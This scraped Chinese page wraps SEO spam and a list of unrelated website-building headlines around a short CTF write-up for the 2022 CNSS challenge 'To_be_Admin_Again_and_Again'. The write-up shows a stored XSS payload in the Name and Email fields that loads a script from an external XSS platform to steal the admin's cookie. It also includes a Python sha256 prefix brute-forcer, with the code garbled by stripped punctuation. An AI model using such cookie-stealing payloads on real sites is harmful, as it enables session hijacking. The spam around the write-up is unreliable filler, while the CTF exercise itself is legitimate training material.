当前位置: 首页 > news >正文

湛江建设局网站2023全国企业公司大黄页

湛江建设局网站,2023全国企业公司大黄页,龙江网站建设,南宁网络知识 例子 。2022 CNSS夏令营 To_be_Admin_Again_and_Again XSS攻击. 与admin有关, 可以尝试http://1.117.6.207:65005/admin, 显示Get out, HACKER! Only admin can see the flag!, 说明需要一个admin的验证, 这里想到获取admin的cookie. 每条留言会自动查看, 可以使用XS…知识 例子 。2022 CNSS夏令营 To_be_Admin_Again_and_Again XSS攻击. 与admin有关, 可以尝试http://1.117.6.207:65005/admin, 显示Get out, HACKER! Only admin can see the flag!, 说明需要一个admin的验证, 这里想到获取admin的cookie. 每条留言会自动查看, 可以使用XSS攻击, 很容易看出来Name和Email两栏有XSS漏洞, 可以使用封闭input标签并插入一个script标签进行Cookie的获取. 这里我直接使用了一个XSS平台进行了payload构建, 可以自己搭服务器. payload: sCRiPt sRC//uj.ci/Qpae/sCrIpT 使用preview可以发现payload已被正常解析成了html语句, 后台也收到了cookie: 然后只需要暴力碰撞一下这个sha256即可发送至后台获取Admin的cookie. 碰撞代码的python源码: import hashlibdef sha256(s):return hashlib.sha256(s.encode(utf-8)).hexdigest()if __name__ __main__:def sha256Crack(token):for i in range(10000000000):# print(sha256(i))a sha256(f{i:04d})[:6] print(f\r{a}, end, flushTrue)if a token[:6]:print()return iprint()return Noneprint(sha256Crack(str(input())))拿到cookie就可以改cookie去/admin了, 直接打开就有flag辽
http://wiki.neutronadmin.com/news/452163/

相关文章:

  • 在线简历制作网站免费当今做啥网站致富
  • 建设网站的好处有哪些可信网站认证服务中心
  • 重庆华鼎达网站建设seo的优点
  • 工装效果图网站网站推广策划包含的内容
  • 怎么为网站网页注册免费网址WordPress多条件搜索
  • 网站做app的重要性网页制作基础教程课件
  • 网站权限配置西双版纳傣族自治州天气预报
  • 网站设置访问密码百度指数api
  • 网站建设的工作在哪里找客户资源丽水建设公司网站
  • 淘宝客如何新建网站谷歌优化排名公司
  • 济宁网站开发做网站要在工商备案吗
  • 图书馆网站建设教程网站特色怎么写
  • 那些网站做网批京东的网站规划与建设
  • 创建网站目录结构应遵循的方法河北涿州住房和城乡建设厅网站
  • 辽宁省住房与城乡建设厅网站html网页版
  • 网站建设的技术有哪些内容创新的广州做网站
  • 网站搭建视频森东网站建设
  • 东莞市企业网站建设平台一流的苏州网站建设
  • 厦门礼品网站商城制作案例新浪网页打不开
  • vps没问题访问不了网站好的网站域名
  • 珠海网站建设培训班梨树县住房和城乡建设局网站
  • 苏州知名网站制作公司企业是如何做电子商务网站
  • 菏泽网站建设公司排名合肥网站维护公司
  • 遂宁网站优化外包做网站
  • 做蛋糕的英文网站网站内容的编辑和更新怎么做
  • 网站上设置返回首页的超链接咋做的网站源码被注册为商标
  • 网站推广目标关键词山西响应式网站建设设计
  • 做暧嗳xo小视频网站wordpress该怎么教
  • 网站前端设计招聘棋牌源码资源网
  • 不用框架做网站免费直播网站